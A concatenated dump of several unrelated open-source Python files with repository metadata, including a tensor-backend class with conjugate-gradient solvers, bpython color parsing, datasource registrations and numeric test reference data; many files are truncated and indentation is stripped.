indices: Tensor of shape (batch_size or 1, update_count, index_vector)
values: Values to scatter at indices. Tensor of shape (batch_size or 1, update_count or 1, channels or 1)
mode: One of ('update', 'add')
Returns:
Copy of base_grid with values at `indices` updated by `values`.
"""
raise NotImplementedError(self)
def any(self, boolean_tensor, axis=None, keepdims=False):
raise NotImplementedError(self)
def all(self, boolean_tensor, axis=None, keepdims=False):
raise NotImplementedError(self)
def fft(self, x):
"""
Computes the n-dimensional FFT along all but the first and last dimensions.
Args:
x: tensor of dimension 3 or higher
Returns:
"""
raise NotImplementedError(self)
def ifft(self, k):
"""
Computes the n-dimensional inverse FFT along all but the first and last dimensions.
Args:
k: tensor of dimension 3 or higher
Returns:
"""
raise NotImplementedError(self)
def imag(self, x):
raise NotImplementedError(self)
def real(self, x):
raise NotImplementedError(self)
def sin(self, x):
raise NotImplementedError(self)
def cos(self, x):
raise NotImplementedError(self)
def tan(self, x):
raise NotImplementedError(self)
def log(self, x):
""" Natural logarithm """
raise NotImplementedError(self)
def log2(self, x):
raise NotImplementedError(self)
def log10(self, x):
raise NotImplementedError(self)
def dtype(self, array) -> DType:
raise NotImplementedError(self)
def tile(self, value, multiples):
"""
Repeats the tensor along each axis the number of times given by multiples.
If `multiples` has more dimensions than `value`, these dimensions are added to `value` as outer dimensions.
Args:
value: tensor
multiples: tuple or list of integers
Returns:
tile tensor
"""
raise NotImplementedError(self)
def sparse_tensor(self, indices, values, shape):
"""
Optional features.
Args:
indices: tuple/list matching the dimensions (pair for matrix)
            values: values to store at the given indices
            shape: shape of the resulting (sparse) tensor
Returns:
"""
raise NotImplementedError(self)
def coordinates(self, tensor):
"""
Returns the coordinates and values of a tensor.
Args:
tensor: Sparse tensor
Returns:
coordinates: `tuple` of tensor holding the coordinate vectors, i.e. (row, col) for matrices.
indices: Tensor holding the corresponding values
"""
raise NotImplementedError(self)
def minimize(self, method: str, f, x0, atol, max_iter, trj: bool):
from scipy.optimize import OptimizeResult, minimize
from threading import Thread
assert self.supports(Backend.functional_gradient)
assert len(self.staticshape(x0)) == 2 # (batch, parameters)
batch_size = self.staticshape(x0)[0]
fg = self.functional_gradient(f, [0], get_output=True)
method_description = f"SciPy {method} with {self.name}"
iterations = [0] * batch_size
function_evaluations = [0] * batch_size
xs = [None] * batch_size
final_losses = [None] * batch_size
converged = [False] * batch_size
diverged = [False] * batch_size
messages = [""] * batch_size
f_inputs = [None] * batch_size
f_b_losses = None
f_b_losses_np = None
f_grad_np = None
f_input_available = Barrier(batch_size + 1)
f_output_available = Barrier(batch_size + 1)
finished = [False] * batch_size
all_finished = False
trajectories = [[] for _ in range(batch_size)] if trj else None
threads = []
for b in range(batch_size):
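            def b_thread(b=b):
                # Reconstruction sketch: the original nested worker definition was truncated
                # in this dump. Each worker drives SciPy's minimize for one batch entry and
                # meets the main thread at the two barriers for every batched evaluation.
                def b_fun(x: numpy.ndarray):
                    function_evaluations[b] += 1
                    f_inputs[b] = self.as_tensor(x, convert_external=True)
                    f_input_available.wait()   # main thread gathers all batch inputs
                    f_output_available.wait()  # main thread has filled f_b_losses_np / f_grad_np
                    if trajectories is not None:
                        trajectories[b].append(SolveResult(method_description, x, f_b_losses_np[b], iterations[b], function_evaluations[b], False, False, ""))
                    return f_b_losses_np[b], f_grad_np[b]
                def callback(x, *args):  # SciPy calls this once per iteration
                    iterations[b] += 1
                # Assumes atol and max_iter arrive as per-batch, NumPy-compatible arrays.
                res = minimize(fun=b_fun, x0=self.numpy(x0[b]), jac=True, method=method,
                               tol=float(atol[b]), options={'maxiter': int(max_iter[b])}, callback=callback)
                assert isinstance(res, OptimizeResult)
                xs[b] = res.x
                final_losses[b] = res.fun
                converged[b] = bool(res.success)
                diverged[b] = not numpy.all(numpy.isfinite(res.x))
                messages[b] = str(res.message)
                finished[b] = True
                while not all_finished:  # keep meeting the barriers until every entry is done
                    f_input_available.wait()
                    f_output_available.wait()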
b_thread = Thread(target=b_thread)
threads.append(b_thread)
b_thread.start()
while True:
f_input_available.wait()
if all(finished):
all_finished = True
f_output_available.wait()
break
_, f_b_losses, f_grad = fg(self.stack(f_inputs))
f_b_losses_np = self.numpy(f_b_losses).astype(numpy.float64)
f_grad_np = self.numpy(f_grad).astype(numpy.float64)
f_output_available.wait()
for b_thread in threads:
b_thread.join() # make sure threads exit correctly
if trj:
max_trajectory_length = max([len(t) for t in trajectories])
last_points = [SolveResult(method_description, xs[b], final_losses[b], iterations[b], function_evaluations[b], converged[b], diverged[b], "") for b in range(batch_size)]
trajectories = [t[:-1] + [last_point] * (max_trajectory_length - len(t) + 1) for t, last_point in zip(trajectories, last_points)]
trajectory = []
for states in zip(*trajectories):
x = self.stack([self.to_float(state.x) for state in states])
residual = self.stack([state.residual for state in states])
iterations = [state.iterations for state in states]
function_evaluations = [state.function_evaluations for state in states]
converged = [state.converged for state in states]
diverged = [state.diverged for state in states]
trajectory.append(SolveResult(method_description, x, residual, iterations, function_evaluations, converged, diverged, messages))
return trajectory
else:
x = self.stack(xs)
residual = self.stack(final_losses)
return SolveResult(method_description, x, residual, iterations, function_evaluations, converged, diverged, messages)
def linear_solve(self, method: str, lin, y, x0, rtol, atol, max_iter, trj: bool) -> SolveResult or List[SolveResult]:
"""
Solve the system of linear equations A x = y.
This method need not provide a gradient for the operation.
Args:
method: Which algorithm to use. One of `('auto', 'CG', 'CG-adaptive')`.
lin: Linear operation. One of
* sparse/dense matrix valid for all instances
* tuple/list of sparse/dense matrices for varying matrices along batch, must have the same nonzero locations.
* linear function A(x), must be called on all instances in parallel
y: target result of A * x. 2nd order tensor (batch, vector) or list of vectors.
x0: Initial guess of size (batch, parameters)
rtol: Relative tolerance of size (batch,)
atol: Absolute tolerance of size (batch,)
max_iter: Maximum number of iterations of size (batch,)
trj: Whether to record and return the optimization trajectory as a `List[SolveResult]`.
Returns:
result: `SolveResult` or `List[SolveResult]`, depending on `trj`.
"""
if method == 'auto':
return self.conjugate_gradient_adaptive(lin, y, x0, rtol, atol, max_iter, trj)
elif method == 'CG':
return self.conjugate_gradient(lin, y, x0, rtol, atol, max_iter, trj)
elif method == 'CG-adaptive':
return self.conjugate_gradient_adaptive(lin, y, x0, rtol, atol, max_iter, trj)
else:
raise NotImplementedError(f"Method '{method}' not supported for linear solve.")
def conjugate_gradient(self, lin, y, x0, rtol, atol, max_iter, trj: bool) -> SolveResult or List[SolveResult]:
""" Standard conjugate gradient algorithm. Signature matches to `Backend.linear_solve()`. """
# Based on "An Introduction to the Conjugate Gradient Method Without the Agonizing Pain" by Jonathan Richard Shewchuk
# symbols: dx=d, dy=q, step_size=alpha, residual_squared=delta, residual=r, y=b
method = f"-Flow CG ({self.name})"
y = self.to_float(y)
x0 = self.copy(self.to_float(x0), only_mutable=True)
batch_size = self.staticshape(y)[0]
tolerance_sq = self.maximum(rtol ** 2 * self.sum(y ** 2, -1), atol ** 2)
x = x0
dx = residual = y - self.linear(lin, x)
it_counter = 0
iterations = self.zeros([batch_size], DType(int, 32))
function_evaluations = self.ones([batch_size], DType(int, 32))
residual_squared = rsq0 = self.sum(residual ** 2, -1, keepdims=True)
diverged = self.any(~self.isfinite(x), axis=(1,))
converged = self.all(residual_squared <= tolerance_sq, axis=(1,))
trajectory = [SolveResult(method, x, residual, iterations, function_evaluations, converged, diverged, "")] if trj else None
finished = converged | diverged | (iterations >= max_iter); not_finished_1 = self.to_int32(~finished) # ; active = self.to_float(self.expand_dims(not_finished_1, -1))
while ~self.all(finished):
it_counter += 1; iterations += not_finished_1
dy = self.linear(lin, dx); function_evaluations += not_finished_1
dx_dy = self.sum(dx * dy, axis=-1, keepdims=True)
step_size = self.divide_no_nan(residual_squared, dx_dy)
step_size *= self.expand_dims(self.to_float(not_finished_1), -1) # this is not really necessary but ensures batch-independence
x += step_size * dx
if it_counter % 50 == 0:
residual = y - self.linear(lin, x); function_evaluations += 1
else:
residual = residual - step_size * dy # in-place subtraction affects convergence
residual_squared_old = residual_squared
residual_squared = self.sum(residual ** 2, -1, keepdims=True)
dx = residual + self.divide_no_nan(residual_squared, residual_squared_old) * dx
diverged = self.any(residual_squared / rsq0 > 100, axis=(1,)) & (iterations >= 8)
converged = self.all(residual_squared <= tolerance_sq, axis=(1,))
if trajectory is not None:
trajectory.append(SolveResult(method, x, residual, iterations, function_evaluations, converged, diverged, ""))
x = self.copy(x)
iterations = self.copy(iterations)
finished = converged | diverged | (iterations >= max_iter); not_finished_1 = self.to_int32(~finished) # ; active = self.to_float(self.expand_dims(not_finished_1, -1))
return trajectory if trj else SolveResult(method, x, residual, iterations, function_evaluations, converged, diverged, "")
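# For reference, the update rules implemented by `conjugate_gradient` above,
# in the notation of the Shewchuk paper (symbol mapping as in the comment there):
#   alpha_k = (r_k . r_k) / (d_k . A d_k)        # step_size
#   x_{k+1} = x_k + alpha_k d_k
#   r_{k+1} = r_k - alpha_k A d_k                # recomputed exactly every 50 steps
#   beta_k  = (r_{k+1} . r_{k+1}) / (r_k . r_k)
#   d_{k+1} = r_{k+1} + beta_k d_k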
def conjugate_gradient_adaptive(self, lin, y, x0, rtol, atol, max_iter, trj: bool) -> SolveResult or List[SolveResult]:
""" Conjugate gradient algorithm with adaptive step size. Signature matches to `Backend.linear_solve()`. """
# Based on the variant described in "Methods of Conjugate Gradients for Solving Linear Systems" by Magnus R. Hestenes and Eduard Stiefel
# https://nvlpubs.nist.gov/nistpubs/jres/049/jresv49n6p409_A1b.pdf
method = f"-Flow CG-adaptive ({self.name})"
y = self.to_float(y)
x0 = self.copy(self.to_float(x0), only_mutable=True)
batch_size = self.staticshape(y)[0]
tolerance_sq = self.maximum(rtol ** 2 * self.sum(y ** 2, -1), atol ** 2)
x = x0
dx = residual = y - self.linear(lin, x)
dy = self.linear(lin, dx)
iterations = self.zeros([batch_size], DType(int, 32))
function_evaluations = self.ones([batch_size], DType(int, 32))
residual_squared = rsq0 = self.sum(residual ** 2, -1, keepdims=True)
diverged = self.any(~self.isfinite(x), axis=(1,))
converged = self.all(residual_squared <= tolerance_sq, axis=(1,))
trajectory = [SolveResult(method, x, residual, iterations, function_evaluations, converged, diverged, "")] if trj else None
continue_ = ~converged & ~diverged & (iterations < max_iter)
_, _, x, _, _, residual, iterations, function_evaluations, converged, diverged =\
self.while_loop(loop, (continue_, 0, x, dx, dy, residual, iterations, function_evaluations, converged, diverged))
return trajectory if trj else SolveResult(method, x, residual, iterations, function_evaluations, converged, diverged, "")
def linear(self, lin, vector):
if callable(lin):
return lin(vector)
elif isinstance(lin, (tuple, list)):
for lin_i in lin:
lin_shape = self.staticshape(lin_i)
assert len(lin_shape) == 2
return self.stack([self.matmul(m, v) for m, v in zip(lin, self.unstack(vector))])
else:
lin_shape = self.staticshape(lin)
assert len(lin_shape) == 2, f"A must be a matrix but got shape {lin_shape}"
return self.matmul(lin, vector)
def gradients(self, y, xs: tuple or list, grad_y) -> tuple:
raise NotImplementedError(self)
def record_gradients(self, xs: tuple or list, persistent=False):
raise NotImplementedError(self)
def stop_gradient(self, value):
raise NotImplementedError(self)
def grid_sample(self, grid, spatial_dims: tuple, coordinates, extrapolation='constant'):
"""
Interpolates a regular grid at the specified coordinates.
Args:
grid: Tensor
spatial_dims: Dimension indices that correspond to coordinate vectors
coordinates: Tensor of floating grid indices.
The last dimension must match `spatial_dims`.
The first grid point of dimension i lies at position 0, the last at grid.shape[i]-1.
extrapolation: Values to use for coordinates outside the grid.
One of `('undefined', 'zeros', 'boundary', 'periodic', 'symmetric', 'reflect')`.
Returns:
sampled values with linear interpolation
"""
return NotImplemented
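# Illustrative call (hypothetical shapes): for a grid of shape (batch, H, W, channels)
# sampled at n points per batch, coordinates has shape (batch, n, 2) and indexes
# the spatial dims (1, 2):
# values = backend.grid_sample(grid, (1, 2), coordinates, extrapolation='boundary')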
def variable(self, value):
return NotImplemented
def ndims(self, tensor):
return len(self.staticshape(tensor))
def size(self, array):
return self.prod(self.shape(array))
def batch_gather(self, tensor, batches):
if isinstance(batches, int):
batches = [batches]
return tensor[batches, ...]
def unstack(self, tensor, axis=0, keepdims=False) -> tuple:
if axis < 0:
axis += len(tensor.shape)
if axis >= len(tensor.shape) or axis < 0:
raise ValueError("Illegal axis value")
result = []
for slice_idx in range(tensor.shape[axis]):
if keepdims:
component = tensor[tuple([slice(slice_idx, slice_idx + 1) if d == axis else slice(None) for d in range(len(tensor.shape))])]
else:
component = tensor[tuple([slice_idx if d == axis else slice(None) for d in range(len(tensor.shape))])]
result.append(component)
return tuple(result)
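# Example for `unstack` above: for t of shape (2, 3),
#   unstack(t, axis=0)                -> 2 tensors of shape (3,)
#   unstack(t, axis=1, keepdims=True) -> 3 tensors of shape (2, 1)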
def equal(self, x, y):
""" Element-wise equality check """
raise NotImplementedError(self)
def not_equal(self, x, y):
return ~self.equal(x, y)
def greater_than(self, x, y):
x, y = self.auto_cast(x, y)
return x > y
def greater_or_equal(self, x, y):
x, y = self.auto_cast(x, y)
return x >= y
def add(self, a, b):
a, b = self.auto_cast(a, b)
return a + b
def sub(self, a, b):
a, b = self.auto_cast(a, b)
return a - b
def mul(self, a, b):
a, b = self.auto_cast(a, b)
return a * b
def div(self, numerator, denominator):
numerator, denominator = self.auto_cast(numerator, denominator)
return numerator / denominator
def pow(self, base, exp):
base, exp = self.auto_cast(base, exp)
return base ** exp
def mod(self, dividend, divisor):
dividend, divisor = self.auto_cast(dividend, divisor)
return dividend % divisor
def and_(self, a, b):
a, b = self.auto_cast(a, b)
return a & b
def or_(self, a, b):
a, b = self.auto_cast(a, b)
return a | b
def xor(self, a, b):
a, b = self.auto_cast(a, b)
return a ^ b
def floordiv(self, a, b):
a, b = self.auto_cast(a, b)
return a // b
BACKENDS = []
""" Global list of all registered backends. Register a `Backend` by adding it to the list. """
_DEFAULT = [] # [0] = global default, [1:] from 'with' blocks
_PRECISION = [32] # [0] = global precision in bits, [1:] from 'with' blocks
def choose_backend(*values, prefer_default=False) -> Backend:
"""
Selects a suitable backend to handle the given values.
This function is used by most math functions operating on `Tensor` objects to delegate the actual computations.
Args:
*values: Values that the selected backend must be able to handle, e.g. native tensors or primitives.
prefer_default: if True, selects the default backend assuming it can handle the values, see `default_backend()`.
Returns:
the selected `Backend`
Raises:
NoBackendFound: if no registered backend can handle the given values.
"""
# --- Default Backend has priority ---
if _is_applicable(_DEFAULT[-1], values) and (prefer_default or _is_specific(_DEFAULT[-1], values)):
return _DEFAULT[-1]
# --- Filter out non-applicable ---
backends = [backend for backend in BACKENDS if _is_applicable(backend, values)]
if len(backends) == 0:
raise NoBackendFound(f"No backend found for types {[type(v).__name__ for v in values]}; registered backends are {BACKENDS}")
# --- Native tensors? ---
for backend in backends:
if _is_specific(backend, values):
return backend
return backends[0]
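# Usage sketch for `choose_backend` above (assuming a NumPy backend is registered):
# b = choose_backend(numpy.zeros(4))            # backend specific to the given values
# b = choose_backend(1.5, prefer_default=True)  # prefers default_backend() if applicable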
def default_backend() -> Backend:
"""
The default backend is preferred by `choose_backend()`.
The default backend can be set globally using `set_global_default_backend()` and locally using `with backend:`.
Returns:
current default `Backend`
"""
return _DEFAULT[-1]
def context_backend() -> Backend or None:
"""
Returns the backend set by the inner-most surrounding `with backend:` block.
If called outside a backend context, returns `None`.
Returns:
`Backend` or `None`
"""
return _DEFAULT[-1] if len(_DEFAULT) > 1 else None
def set_global_default_backend(backend: Backend):
"""
Sets the given backend as default.
This setting can be overridden using `with backend:`.
See `default_backend()`, `choose_backend()`.
Args:
backend: `Backend` to set as default
"""
assert isinstance(backend, Backend)
_DEFAULT[0] = backend
def set_global_precision(floating_point_bits: int):
"""
Sets the global floating point precision. This affects all registered backends.
If `floating_point_bits` is an integer, all floating point tensors created henceforth will be of the corresponding data type, float16, float32 or float64.
Operations may also convert floating point values to this precision, even if the input had a different precision.
If `floating_point_bits` is None, new tensors will default to float32 unless specified otherwise.
The output of math operations has the same precision as its inputs.
Args:
floating_point_bits: one of (16, 32, 64, None)
"""
_PRECISION[0] = floating_point_bits
def get_precision() -> int:
"""
Gets the current target floating point precision in bits.
The precision can be set globally using `set_global_precision()` or locally using `with precision(p):`.
Any Backend method may convert floating point values to this precision, even if the input had a different precision.
Returns:
16 for half, 32 for single, 64 for double
"""
return _PRECISION[-1]
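# Usage sketch for the precision API above (the `with precision(p):` form is the
# context manager referenced in the docstrings; assumed to be defined elsewhere):
# set_global_precision(64)   # new float tensors default to float64
# print(get_precision())     # -> 64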
def convert(tensor, backend: Backend = None, use_dlpack=True):
"""
Convert a Tensor to the native format of `backend`.
If the target backend can operate natively on `tensor`, returns `tensor`.
If both backends support *DLPack* and `use_dlpack=True`, uses zero-copy conversion using the DLPack library.
Else, intermediately converts `tensor` to a NumPy array.
*Warning*: This operation breaks the automatic differentiation chain.
Args:
tensor: Native tensor belonging to any registered backend.
backend: Target backend. If `None`, uses the current default backend, see `default_backend()`.
use_dlpack: Whether to attempt zero-copy conversion via DLPack when both backends support it.
Returns:
Tensor belonging to `backend`.
"""
backend = backend or default_backend()
current_backend = choose_backend(tensor, prefer_default=False)
if backend.is_tensor(tensor, True) or backend is current_backend:
return tensor
if use_dlpack and current_backend.supports(Backend.to_dlpack) and backend.supports(Backend.from_dlpack):
capsule = current_backend.to_dlpack(tensor)
return backend.from_dlpack(capsule)
else:
nparray = current_backend.numpy(tensor)
return backend.as_tensor(nparray)
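# Usage sketch for `convert` above (TORCH is a hypothetical registered Backend
# instance; as noted, this breaks the automatic differentiation chain):
# torch_native = convert(numpy_array, backend=TORCH)   # DLPack zero-copy if supported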
# Backend choice utility functions
# Other low-level helper functions
| 37.677311 | 216 | 0.629293 |
6a42b37643b67ad750eaa6bdb4b138eb04976787
| 2,736 |
py
|
Python
|
bpython/curtsiesfrontend/parse.py
|
dtrodrigues/bpython
|
143e4e55d8f5227149528a5880a32a516a40f14d
|
[
"PSF-2.0"
] | 2,168 |
2015-01-01T11:41:40.000Z
|
2022-03-29T07:44:48.000Z
|
bpython/curtsiesfrontend/parse.py
|
dtrodrigues/bpython
|
143e4e55d8f5227149528a5880a32a516a40f14d
|
[
"PSF-2.0"
] | 521 |
2015-01-02T16:43:44.000Z
|
2022-03-31T12:37:55.000Z
|
bpython/curtsiesfrontend/parse.py
|
dtrodrigues/bpython
|
143e4e55d8f5227149528a5880a32a516a40f14d
|
[
"PSF-2.0"
] | 250 |
2015-01-08T21:28:18.000Z
|
2022-02-28T16:07:43.000Z
|
import re
from curtsies.formatstring import fmtstr, FmtStr
from curtsies.termformatconstants import (
FG_COLORS,
BG_COLORS,
colors as CURTSIES_COLORS,
)
from functools import partial
from ..lazyre import LazyReCompile
COLORS = CURTSIES_COLORS + ("default",)
CNAMES = dict(zip("krgybmcwd", COLORS))
# hack for finding the "inverse"
INVERSE_COLORS = {
CURTSIES_COLORS[idx]: CURTSIES_COLORS[
(idx + (len(CURTSIES_COLORS) // 2)) % len(CURTSIES_COLORS)
]
for idx in range(len(CURTSIES_COLORS))
}
INVERSE_COLORS["default"] = INVERSE_COLORS[CURTSIES_COLORS[0]]
def func_for_letter(letter_color_code: str, default: str = "k"):
"""Returns FmtStr constructor for a bpython-style color code"""
if letter_color_code == "d":
letter_color_code = default
elif letter_color_code == "D":
letter_color_code = default.upper()
return partial(
fmtstr,
fg=CNAMES[letter_color_code.lower()],
bold=letter_color_code.isupper(),
)
def parse(s):
"""Returns a FmtStr object from a bpython-formatted colored string"""
rest = s
stuff = []
while True:
if not rest:
break
start, rest = peel_off_string(rest)
stuff.append(start)
return (
sum((fs_from_match(d) for d in stuff[1:]), fs_from_match(stuff[0]))
if len(stuff) > 0
else FmtStr()
)
peel_off_string_re = LazyReCompile(
r"""(?P<colormarker>\x01
(?P<fg>[krgybmcwdKRGYBMCWD]?)
(?P<bg>[krgybmcwdKRGYBMCWDI]?)?)
(?P<bold>\x02?)
\x03
(?P<string>[^\x04]*)
\x04
(?P<rest>.*)
""",
re.VERBOSE | re.DOTALL,
)
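# Illustrative marker string (an assumption read off peel_off_string_re above):
# "\x01y\x03hello\x04" encodes the text "hello" with foreground code 'y' (yellow).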
| 25.811321 | 75 | 0.592105 |
6a42bb37de5c18887c2934162db7f55a1fffd8c4
| 1,277 |
py
|
Python
|
sarpy/io/general/nitf_elements/tres/unclass/BANDSA.py
|
pressler-vsc/sarpy
|
fa6c951c42b9a7d9df2edfa53c771494cb0246fb
|
[
"MIT"
] | 1 |
2021-02-04T08:44:18.000Z
|
2021-02-04T08:44:18.000Z
|
sarpy/io/general/nitf_elements/tres/unclass/BANDSA.py
|
pressler-vsc/sarpy
|
fa6c951c42b9a7d9df2edfa53c771494cb0246fb
|
[
"MIT"
] | null | null | null |
sarpy/io/general/nitf_elements/tres/unclass/BANDSA.py
|
pressler-vsc/sarpy
|
fa6c951c42b9a7d9df2edfa53c771494cb0246fb
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from ..tre_elements import TREExtension, TREElement
__classification__ = "UNCLASSIFIED"
__author__ = "Thomas McCullough"
| 33.605263 | 59 | 0.623336 |
6a4363b0709ea506c58a60f1aaca731beda241f8
| 5,631 |
py
|
Python
|
ktrain/graph/learner.py
|
husmen/ktrain
|
4147b0bd146deb513c6f94505908294a5163efac
|
[
"Apache-2.0"
] | 1,013 |
2019-06-04T14:25:24.000Z
|
2022-03-26T05:52:00.000Z
|
ktrain/graph/learner.py
|
husmen/ktrain
|
4147b0bd146deb513c6f94505908294a5163efac
|
[
"Apache-2.0"
] | 427 |
2019-06-17T13:45:50.000Z
|
2022-03-25T16:23:49.000Z
|
ktrain/graph/learner.py
|
husmen/ktrain
|
4147b0bd146deb513c6f94505908294a5163efac
|
[
"Apache-2.0"
] | 272 |
2019-06-05T03:19:07.000Z
|
2022-03-28T02:23:37.000Z
|
from ..imports import *
from .. import utils as U
from ..core import GenLearner
| 35.19375 | 96 | 0.582845 |
6a448dff56ffb800e61093b735c0b738b7008227
| 12,168 |
py
|
Python
|
VegaZero2VegaLite.py
|
Thanksyy/Vega-Zero
|
dd25cb145faec047b01ca54c69ba96c56adb99f4
|
[
"MIT"
] | 5 |
2021-09-16T11:55:12.000Z
|
2022-03-03T12:20:22.000Z
|
VegaZero2VegaLite.py
|
Thanksyy/Vega-Zero
|
dd25cb145faec047b01ca54c69ba96c56adb99f4
|
[
"MIT"
] | 1 |
2021-11-22T09:41:52.000Z
|
2021-11-24T02:25:49.000Z
|
VegaZero2VegaLite.py
|
Thanksyy/Vega-Zero
|
dd25cb145faec047b01ca54c69ba96c56adb99f4
|
[
"MIT"
] | 2 |
2021-09-17T09:44:18.000Z
|
2022-03-05T19:14:45.000Z
|
__author__ = "Yuyu Luo"
import json
import pandas
| 48.094862 | 123 | 0.469921 |
6a452a7c2c457bc63abb482a8725d53337bd5e88
| 6,254 |
py
|
Python
|
utils/dancer.py
|
kmzbrnoI/ac-python
|
383802734e17d2a00c0b86083cf923517db02acd
|
[
"Apache-2.0"
] | null | null | null |
utils/dancer.py
|
kmzbrnoI/ac-python
|
383802734e17d2a00c0b86083cf923517db02acd
|
[
"Apache-2.0"
] | 2 |
2020-04-12T11:31:24.000Z
|
2020-04-14T17:17:00.000Z
|
utils/dancer.py
|
kmzbrnoI/ac-python
|
383802734e17d2a00c0b86083cf923517db02acd
|
[
"Apache-2.0"
] | null | null | null |
"""Library for executing user-defined dance."""
import logging
from typing import Any, Dict, Optional, Callable
import datetime
import ac
import ac.blocks
from ac import ACs, AC
JC = Dict[str, Any]
def track_is_occupied(block: ac.Block) -> bool:
return bool(block['blockState']['state'] == 'occupied')
| 28.820276 | 79 | 0.570675 |
6a46dce57aefdfdd686c732c07a762fc3d1085f3
| 780 |
py
|
Python
|
praw/models/reddit/mixins/reportable.py
|
zachwylde00/praw
|
ad1d73e6a4a33397bbd983bdfde1a4f99ce5607d
|
[
"BSD-2-Clause"
] | 38 |
2020-03-14T22:22:40.000Z
|
2022-02-24T18:05:45.000Z
|
praw/models/reddit/mixins/reportable.py
|
zachwylde00/praw
|
ad1d73e6a4a33397bbd983bdfde1a4f99ce5607d
|
[
"BSD-2-Clause"
] | 3 |
2021-03-30T13:15:12.000Z
|
2021-09-22T18:55:59.000Z
|
praw/models/reddit/mixins/reportable.py
|
zachwylde00/praw
|
ad1d73e6a4a33397bbd983bdfde1a4f99ce5607d
|
[
"BSD-2-Clause"
] | 9 |
2020-02-21T23:55:13.000Z
|
2021-03-22T07:48:23.000Z
|
"""Provide the ReportableMixin class."""
from ....const import API_PATH
| 26 | 76 | 0.60641 |
6a49b924a41db77163a887ba4fb25f3e874556fc
| 3,158 |
py
|
Python
|
mellon/factories/filesystem/file.py
|
LaudateCorpus1/mellon
|
a7a9f6d8abf1dd03b63a94ddb4439c6cc6c2e272
|
[
"MIT"
] | 5 |
2016-12-20T19:39:01.000Z
|
2021-01-08T16:19:17.000Z
|
mellon/factories/filesystem/file.py
|
CrowdStrike/mellon
|
7216f255d397a41b1c2777a1b02f1c085d07ddfe
|
[
"MIT"
] | 1 |
2018-03-21T17:05:13.000Z
|
2018-03-21T17:05:13.000Z
|
mellon/factories/filesystem/file.py
|
LaudateCorpus1/mellon
|
a7a9f6d8abf1dd03b63a94ddb4439c6cc6c2e272
|
[
"MIT"
] | 2 |
2017-11-01T15:03:27.000Z
|
2018-11-13T03:04:44.000Z
|
import collections
import os.path
from zope import component
from zope import interface
from zope.component.factory import Factory
from sparc.configuration import container
import mellon
mellonByteFileFromFilePathAndConfigFactory = Factory(MellonByteFileFromFilePathAndConfig)
mellonUnicodeFileFromFilePathAndConfigFactory = Factory(MellonUnicodeFileFromFilePathAndConfig)
mellonFileProviderForRecursiveDirectoryConfigFactory = Factory(MellonFileProviderForRecursiveDirectoryConfig)
interface.alsoProvides(mellonFileProviderForRecursiveDirectoryConfigFactory, mellon.IMellonFileProviderFactory)
| 39.974684 | 111 | 0.662445 |
6a49d502d09956cefd00c54538889163bfebf8f9
| 1,157 |
py
|
Python
|
dltb/thirdparty/datasource/__init__.py
|
CogSciUOS/DeepLearningToolbox
|
bf07578b9486d8c48e25df357bc4b9963b513b46
|
[
"MIT"
] | 2 |
2019-09-01T01:38:59.000Z
|
2020-02-13T19:25:51.000Z
|
dltb/thirdparty/datasource/__init__.py
|
CogSciUOS/DeepLearningToolbox
|
bf07578b9486d8c48e25df357bc4b9963b513b46
|
[
"MIT"
] | null | null | null |
dltb/thirdparty/datasource/__init__.py
|
CogSciUOS/DeepLearningToolbox
|
bf07578b9486d8c48e25df357bc4b9963b513b46
|
[
"MIT"
] | null | null | null |
"""Predefined Datasources.
"""
# toolbox imports
from ...datasource import Datasource
Datasource.register_instance('imagenet-val', __name__ + '.imagenet',
'ImageNet', section='val') # section='train'
Datasource.register_instance('dogsandcats', __name__ + '.dogsandcats',
'DogsAndCats')
Datasource.register_instance('widerface', __name__ + '.widerface', 'WiderFace')
Datasource.register_instance('fgnet', __name__ + '.fgnet', 'FGNet')
Datasource.register_instance('Helen', __name__ + '.helen', 'Helen')
Datasource.register_instance('lfw', __name__ + '.lfw', 'LabeledFacesInTheWild')
Datasource.register_instance('ms-celeb-1m', __name__ + '.face', 'MSCeleb1M')
Datasource.register_instance('5celeb', __name__ + '.fivecelebface',
'FiveCelebFace')
Datasource.register_instance('ffhq', __name__ + '.ffhq', 'FFHQ')
Datasource.register_instance('celeba', __name__ + '.celeba', 'CelebA')
Datasource.register_instance('celeba-aligned', __name__ + '.celeba',
'CelebA', aligned=True)
Datasource.register_class('WiderFace', __name__ + '.widerface')
| 48.208333 | 79 | 0.679343 |
6a4a66b1a2f63505cf706ff9fb8521db9d0bf0ee
| 2,127 |
py
|
Python
|
tests/test_results.py
|
babinyurii/RECAN
|
b49326b47bae22316c3776fee2f398e09a98ba96
|
[
"MIT"
] | 7 |
2019-09-23T12:46:03.000Z
|
2022-02-16T11:32:58.000Z
|
tests/test_results.py
|
babinyurii/RECAN
|
b49326b47bae22316c3776fee2f398e09a98ba96
|
[
"MIT"
] | 14 |
2020-01-28T16:20:15.000Z
|
2021-04-13T17:24:00.000Z
|
tests/test_results.py
|
babinyurii/RECAN
|
b49326b47bae22316c3776fee2f398e09a98ba96
|
[
"MIT"
] | 8 |
2020-01-03T11:47:51.000Z
|
2021-09-17T03:43:43.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 22 15:58:44 2019
@author: babin
"""
posits_def = [251, 501, 751, 1001, 1251, 1501, 1751, 2001, 2251, 2501, 2751, 3001, 3215]
dist_whole_align_ref = {'AB048704.1_genotype_C_':
[0.88,
0.938,
0.914,
0.886,
0.89,
0.908,
0.938,
0.948,
0.948,
0.886,
0.852,
0.8580645161290322,
0.827906976744186],
'AB010291.1_Bj':
[0.968,
0.986,
0.946,
0.92,
0.94,
0.964,
0.95,
0.892,
0.914,
0.9359999999999999,
0.924,
0.935483870967742,
0.9255813953488372]}
dist_win_250_shift_100_ref = {'AB048704.1_genotype_C_':
[0.87,
0.9,
0.9359999999999999,
0.924,
0.944,
0.944,
0.948,
0.888,
0.868,
0.86,
0.888,
0.9,
0.908,
0.88,
0.916,
0.924,
0.94,
0.96,
0.948,
0.9319999999999999,
0.944,
0.9359999999999999,
0.96,
0.9319999999999999,
0.864,
0.8200000000000001,
0.88,
0.892,
0.88,
0.844,
0.827906976744186,
0.8608695652173913,
0.9333333333333333],
'AB010291.1_Bj': [0.95,
0.984,
0.988,
0.984,
0.98,
0.98,
0.98,
0.92,
0.896,
0.888,
0.928,
0.94,
0.96,
0.948,
0.976,
0.976,
0.968,
0.952,
0.896,
0.844,
0.86,
0.908,
0.976,
0.948,
0.916,
0.904,
0.9359999999999999,
0.948,
0.94,
0.9359999999999999,
0.9255813953488372,
0.9217391304347826,
0.8666666666666667]}
dist_whole_align_def_params_k2p = {'AB048704.1_genotype_C_':
